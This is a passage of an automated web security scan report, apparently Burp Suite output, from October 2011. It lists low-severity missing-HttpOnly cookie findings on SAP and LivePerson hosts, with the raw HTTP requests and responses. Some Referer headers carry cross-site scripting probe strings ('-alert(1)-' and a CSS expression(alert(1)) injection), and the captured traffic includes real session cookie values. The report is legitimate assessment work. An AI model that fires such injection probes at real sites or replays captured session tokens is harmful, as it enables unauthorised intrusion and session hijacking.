Host:   http://sales.liveperson.net
Path:   /visitor/addons/deploy2.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy2.asp?site=37021986&d_id=1&default=simpleDeploy HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:21:48 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 11 Oct 2011 14:31:36 GMT
Content-Length: 46014
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDSABCBTCA=JPCIGIDCLHAIHDGJNIENHOAB; path=/
Cache-control: public, max-age=3600, s-maxage=3600

lpAddMonitorTag();
if(typeof lpMTagConfig!="undefined")lpMTagConfig.getLPVarValue=function(c){if(!lpMTagConfig.varLookup){lpMTagConfig.varLookup={};for(var b=0;b<lpMTagConfig.vars.length;b++){var a=l
...[SNIP]...
12.9. http://sales.liveperson.net/visitor/addons/deploy2.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /visitor/addons/deploy2.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy2.asp?site=37021986&d_id=1&default=simpleDeploy HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/index.epx
Cookie: LivePersonID=LP i=546022977410,d=1312768968

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:38:52 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 11 Oct 2011 14:31:36 GMT
Content-Length: 46014
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDASADRDQC=BNPGFJDCEAGJGEJKHLFMGKBO; path=/
Cache-control: public, max-age=3600, s-maxage=3600

lpAddMonitorTag();
if(typeof lpMTagConfig!="undefined")lpMTagConfig.getLPVarValue=function(c){if(!lpMTagConfig.varLookup){lpMTagConfig.varLookup={};for(var b=0;b<lpMTagConfig.vars.length;b++){var a=l
...[SNIP]...
12.10. http://sales.liveperson.net/visitor/addons/deploy2.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /visitor/addons/deploy2.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy2.asp?site=37021986&d_id=1&default=simpleDeploy HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://www.sapvirtualevents.com/teched?d8105'-alert(1)-'ed14687c86f=1
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: sales.liveperson.net
Proxy-Connection: Keep-Alive
Cookie: ASPSESSIONIDAQTARCRC=MIIACKDCJHLJIMCHEDDAEOPL; ASPSESSIONIDSABCBTCA=KLHGHIDCCCDLOFIHENIPDALD; LivePersonID=LP i=5140389589811,d=1318691628

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:17:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 11 Oct 2011 14:31:36 GMT
Content-Length: 46014
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDQSDDABTQ=KPKNCFDCEAGIAJJEPGOAFPCP; path=/
Cache-control: public, max-age=3600, s-maxage=3600

lpAddMonitorTag();
if(typeof lpMTagConfig!="undefined")lpMTagConfig.getLPVarValue=function(c){if(!lpMTagConfig.varLookup){lpMTagConfig.varLookup={};for(var b=0;b<lpMTagConfig.vars.length;b++){var a=l
...[SNIP]...
12.11. http://sales.liveperson.net/visitor/addons/deploy2.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /visitor/addons/deploy2.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy2.asp?site=37021986&d_id=1&default=simpleDeploy HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Cache-Control: max-age=0
If-Modified-Since: Tue, 11 Oct 2011 14:31:36 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapphirenow.com/login.aspx?ReturnUrl=%2fdefault.aspxfcf2f%22style%3d%22x%3aexpression(alert(1))%2234bced315ef
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678

Response

HTTP/1.1 304 Not Modified
Date: Sat, 15 Oct 2011 15:22:51 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSBDBQSD=OGGDIHDCHIGFFJLFNMDDPLMP; path=/
Cache-control: private

12.12. https://sales.liveperson.net/visitor/addons/deploy2.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://sales.liveperson.net
Path:   /visitor/addons/deploy2.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy2.asp?site=37021986&d_id=1&default=simpleDeploy HTTP/1.1
Accept: application/javascript, */*;q=0.8
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Referer: https://www.sap.com/sme/contactsap/index.epx
Host: sales.liveperson.net
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:27:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 11 Oct 2011 14:31:36 GMT
Content-Length: 46014
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDASQTAASD=EFCBMEDCJGOGKJJDOJPEIKJJ; path=/
Cache-control: public, max-age=3600, s-maxage=3600

lpAddMonitorTag();
if(typeof lpMTagConfig!="undefined")lpMTagConfig.getLPVarValue=function(c){if(!lpMTagConfig.varLookup){lpMTagConfig.varLookup={};for(var b=0;b<lpMTagConfig.vars.length;b++){var a=l
...[SNIP]...
12.13. https://sales.liveperson.net/visitor/addons/deploy2.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://sales.liveperson.net
Path:   /visitor/addons/deploy2.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy2.asp?site=37021986&d_id=1&default=simpleDeploy HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.sap.com/sme/contactsap/index.epx
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: sales.liveperson.net
If-Modified-Since: Tue, 11 Oct 2011 14:31:36 GMT
Connection: Keep-Alive
Cookie: ASPSESSIONIDAQTARCRC=MIIACKDCJHLJIMCHEDDAEOPL; LivePersonID=LP i=5140389589811,d=1318691628

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:27:37 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 11 Oct 2011 14:31:36 GMT
Content-Length: 46014
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDSQQSRQRS=KCFLHIDCADKIDENMHBAIHMGO; path=/
Cache-control: public, max-age=3600, s-maxage=3600

lpAddMonitorTag();
if(typeof lpMTagConfig!="undefined")lpMTagConfig.getLPVarValue=function(c){if(!lpMTagConfig.varLookup){lpMTagConfig.varLookup={};for(var b=0;b<lpMTagConfig.vars.length;b++){var a=l
...[SNIP]...
12.14. https://sapphire-nowmadrid.sapevents.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://sapphire-nowmadrid.sapevents.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: sapphire-nowmadrid.sapevents.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: CFID=961013;expires=Mon, 07-Oct-2041 14:35:04 GMT;path=/
Set-Cookie: CFTOKEN=cb2412da3e988c3-0801EEF5-0494-7B81-1E70242D17ED02CD;expires=Mon, 07-Oct-2041 14:35:04 GMT;path=/
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:35:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/jav
...[SNIP]...
12.15. http://store.businessobjects.com/DRHM/store  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://store.businessobjects.com
Path:   /DRHM/store

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /DRHM/store?Action=DisplayProductDetailsPage&SiteID=bobjamer&Locale=en_US&Env=BASE&parentCategoryID=57065700&categoryID=57066300&productID=231860100 HTTP/1.1
Host: store.businessobjects.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://store.businessobjects.com/DRHM/store?Action=DisplayProductDetailsPage&SiteID=bobjamer&Locale=en_US&Env=BASE&productID=231860300&parentCategoryID=57065700&categoryID=57066300&_s_icmp=CG4E7A594
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORA_WX_SESSION="10.1.2.194:260-0#0"; JSESSIONID=0A6E08D05288243D3676FD314938750B; VISITOR_ID=971D4E8DFAED43679E246899D1DA9F034AAC40FA94AD0B51; bobjamer.pgm=" 77298800"; BIGipServerp-drh-dc1pod5-pool1-active=3254911242.260.0000; fcOOS=fcOptOutChip=undefined; fcR=http%3A//www.sap.com/index.epx; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; style=null; extcmp=null; fcP=C=0&T=1318689061488&DTO=1318689060945&U=2033968180&V=1318689071622; mbox=check#true#1318689134|session#1318689062767-959486#1318690934|PC#1318689062767-959486.19#1319898674; s_pers=%20s_ttc%3D1318688493%7C1350225062924%3B%20v36%3D%255B%255B%2527CG4DA4BC51%2527%252C%25271318689062905%2527%255D%252C%255B%2527CG4E7A594%2527%252C%25271318689073781%2527%255D%255D%7C1476541873780%3B%20c13%3Destores%253Aus%253Aproduct%2520page%253A231860300%7C1318690909272%3B%20pe%3DprodView%252Cevent18%7C1318690909274%3B%20c3%3Dno%2520value%7C1318690909280%3B%20s_nr%3D1318689109286-New%7C1321281109286%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292709289%3B%20s_visit%3D1%7C1318690909291%3B%20gpv_p47%3Dno%2520value%7C1318690909293%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20v13%3DCG4E7A594%3B%20s_sq%3Dsapglobal%252Csapsuite1%252Csapvbuus%253D%252526pid%25253Destores%2525253Aus%2525253Aproduct%25252520page%2525253A231860300%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//store.businessobjects.com/DRHM/store%2525253FAction%2525253DDisplayProductDetailsPage%25252526SiteID%2525253Dbobjamer%25252526Locale%2525253D%252526ot%25253DA%3B; fcPT=http%3A//store.businessobjects.com/DRHM/store%3FAction%3DDisplayProductDetailsPage%26SiteID%3Dbobjamer%26Locale%3Den_US%26Env%3DBASE%26productID%3D231860300%26parentCategoryID%3D57065700%26categoryID%3D57066300%26_s_icmp%3DCG4E7A594; fcC=X=C2033968180&Y=1318689071777&FV=10&H=1318689071622&fcTHR=store.businessobjects.com}www.businessobjects.com&Z=1&E=8823527&F=0&I=1318689109320

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Set-Cookie: ORA_WX_SESSION="10.1.2.194:260-0#0"; path=/
Set-Cookie: ORA_WX_SESSION="10.1.2.194:260-0#0"; path=/
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=177811556851,0)
Date: Sat, 15 Oct 2011 14:31:30 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app50
Content-Length: 105386


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
12.16. http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.%2077298800  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://store.businessobjects.com
Path:   /store/bobjamer/DisplayHomePage/pgm.%2077298800

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /store/bobjamer/DisplayHomePage/pgm.%2077298800?_s_icmp=CG4DA4BC51 HTTP/1.1
Host: store.businessobjects.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Location: http://reservoir.marketstudio.net/reservoir?d=http%3A%2F%2Fstore.businessobjects.com%2Fstore%2Fbobjamer%2FDisplayHomePage%2Fpgm.+77298800%3F_s_icmp%3DCG4DA4BC51%26resid%3D__RESID__%26rests%3D1318689037443&t=commerce&p=globalcommerce&p1=bobjamer&p2=40461809026&p3=newsession
Content-Type: text/plain
Set-Cookie: ORA_WX_SESSION="10.1.2.194:260-0#0"; path=/
Set-Cookie: JSESSIONID=0A6E08D05288243D3676FD314938750B; path=/
Set-Cookie: VISITOR_ID=971D4E8DFAED43679E246899D1DA9F034AAC40FA94AD0B51; expires=Sun, 14-Oct-2012 20:19:49 GMT; path=/
Set-Cookie: bobjamer.pgm=" 77298800"; expires=Sat, 15-Oct-2011 17:18:37 GMT; path=/
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=23192674609,0)
Content-Length: 0
Date: Sat, 15 Oct 2011 14:30:37 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app50
Set-Cookie: BIGipServerp-drh-dc1pod5-pool1-active=3254911242.260.0000; path=/

12.17. http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.+77298800  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://store.businessobjects.com
Path:   /store/bobjamer/DisplayHomePage/pgm.+77298800

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /store/bobjamer/DisplayHomePage/pgm.+77298800 HTTP/1.1
Host: store.businessobjects.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Set-Cookie: ORA_WX_SESSION="10.1.2.194:260-0#0"; path=/
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=302367354647,0)
Content-Length: 152305
Date: Sat, 15 Oct 2011 14:59:55 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app50
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
12.18. http://store.businessobjects.com/store/bobjamer/en_US/DisplayCategoryProductListPage/categoryID.57066000/parentCategoryID.57065700  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://store.businessobjects.com
Path:   /store/bobjamer/en_US/DisplayCategoryProductListPage/categoryID.57066000/parentCategoryID.57065700

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /store/bobjamer/en_US/DisplayCategoryProductListPage/categoryID.57066000/parentCategoryID.57065700 HTTP/1.1
Host: store.businessobjects.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://store.businessobjects.com/DRHM/store?Action=DisplayProductDetailsPage&SiteID=bobjamer&Locale=en_US&Env=BASE&productID=231860300&parentCategoryID=57065700&categoryID=57066300&_s_icmp=CG4E7A594
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORA_WX_SESSION="10.1.2.194:260-0#0"; JSESSIONID=0A6E08D05288243D3676FD314938750B; VISITOR_ID=971D4E8DFAED43679E246899D1DA9F034AAC40FA94AD0B51; bobjamer.pgm=" 77298800"; BIGipServerp-drh-dc1pod5-pool1-active=3254911242.260.0000; fcOOS=fcOptOutChip=undefined; fcR=http%3A//www.sap.com/index.epx; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; style=null; extcmp=null; fcP=C=0&T=1318689061488&DTO=1318689060945&U=2033968180&V=1318689071622; mbox=check#true#1318689134|session#1318689062767-959486#1318690934|PC#1318689062767-959486.19#1319898674; s_pers=%20s_ttc%3D1318688493%7C1350225062924%3B%20v36%3D%255B%255B%2527CG4DA4BC51%2527%252C%25271318689062905%2527%255D%252C%255B%2527CG4E7A594%2527%252C%25271318689073781%2527%255D%255D%7C1476541873780%3B%20c13%3Destores%253Aus%253Aproduct%2520page%253A231860300%7C1318690949014%3B%20pe%3DprodView%252Cevent18%7C1318690949017%3B%20c3%3Dno%2520value%7C1318690949019%3B%20s_nr%3D1318689149030-New%7C1321281149030%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292749033%3B%20s_visit%3D1%7C1318690949034%3B%20gpv_p47%3Dno%2520value%7C1318690949037%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20v13%3DCG4E7A594%3B%20s_sq%3Dsapglobal%252Csapsuite1%252Csapvbuus%253D%252526pid%25253Destores%2525253Aus%2525253Aproduct%25252520page%2525253A231860300%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//store.businessobjects.com/store/bobjamer/en_US/DisplayCategoryProductListPage/categoryID.5706%252526ot%25253DA%3B; fcPT=http%3A//store.businessobjects.com/DRHM/store%3FAction%3DDisplayProductDetailsPage%26SiteID%3Dbobjamer%26Locale%3Den_US%26Env%3DBASE%26productID%3D231860300%26parentCategoryID%3D57065700%26categoryID%3D57066300%26_s_icmp%3DCG4E7A594; fcC=X=C2033968180&Y=1318689071777&FV=10&H=1318689071622&fcTHR=store.businessobjects.com}www.businessobjects.com&Z=1&E=8823527&F=0&I=1318689149047

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Set-Cookie: ORA_WX_SESSION="10.1.2.194:260-0#0"; path=/
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=169221662538,0)
Date: Sat, 15 Oct 2011 14:32:10 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app50
Content-Length: 84990


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
12.19. http://wiki.sdn.sap.com/wiki/display/events/SAP+TechEd  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://wiki.sdn.sap.com
Path:   /wiki/display/events/SAP+TechEd

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wiki/display/events/SAP+TechEd HTTP/1.1
Host: wiki.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP NetWeaver Application Server 7.20 / AS Java 7.20
sdn_uid: Guest
sdn_guid: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
sdn_visit: QUMxMDU0MEMtMTMzMDgxNzE1MTUtRTg5RUY3QjBBRTUxRTM5OQ==
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-confluence-request-time: 1318690690325
x-confluence-cluster-node: Member(Id=2, Timestamp=2011-10-09 03:10:58.964, Address=172.16.84.12:8088, MachineId=59404, Location=process:32003@spwdfvml0210)
sdn_wiki: 31450
Vary: User-Agent
Date: Sat, 15 Oct 2011 14:58:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: saplb_*=(J2EE8243520)8243550; Version=1; Path=/
Set-Cookie: JSESSIONID=pWWyjjz4uah0H07dK4MUPnEXFRcIMwFeyX0A_SAPCbUutq_0_dm5dh7v_eiJ61jq; Version=1; Path=/
Content-Length: 104600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <!-- SDN Wiki generated page -->
    <title>SAP Community Network Wiki - Community Events
...[SNIP]...
12.20. https://wiki.sdn.sap.com/wiki/display/HOME  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://wiki.sdn.sap.com
Path:   /wiki/display/HOME

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wiki/display/HOME HTTP/1.1
Host: wiki.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: SAP NetWeaver Application Server 7.20 / AS Java 7.20
sdn_uid: Guest
sdn_guid: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
sdn_visit: QUMxMDU0MDgtMTMzMDgxNzBFNTktQUNBQzA5QTU4MkExRkM0NA==
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-confluence-request-time: 1318690688602
x-confluence-cluster-node: Member(Id=1, Timestamp=2011-10-09 03:06:04.333, Address=172.16.84.8:8088, MachineId=59400, Location=process:23847@spwdfvml0204)
Location: https://wiki.sdn.sap.com:443/wiki/display/HOME/FAQ
Content-Length: 1751
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:58:08 GMT
Connection: close
Set-Cookie: saplb_*=(J2EE8243320)8243350; Version=1; Path=/
Set-Cookie: JSESSIONID=8zWp1LE9zVQKhsRFGYO-DyFbDhcIMwGWyH0A_SAPgKRDRzD6Pucfy_Alqw7AWMYs; Version=1; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>302 Found</title>
<style>
td {font-family : Arial, Tahoma, Helvetica, sans-serif; font-size : 14px;}

...[SNIP]...
12.21. http://www.sap.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.sap.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 301 Moved Permanently
Set-Cookie: nwt=wetnow; path=/
Set-Cookie: ARPT=ONKKMMS169.145.6.18CKMMM; path=/
Cache-Control: private
Content-Length: 0
Location: /index.epx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:20:42 GMT; path=/
Set-Cookie: session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; domain=.sap.com; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 15:20:42 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:20:42 GMT

12.22. http://www.sapandasug.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.sapandasug.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.sapandasug.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapphirenow.com/madrid/Overview.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
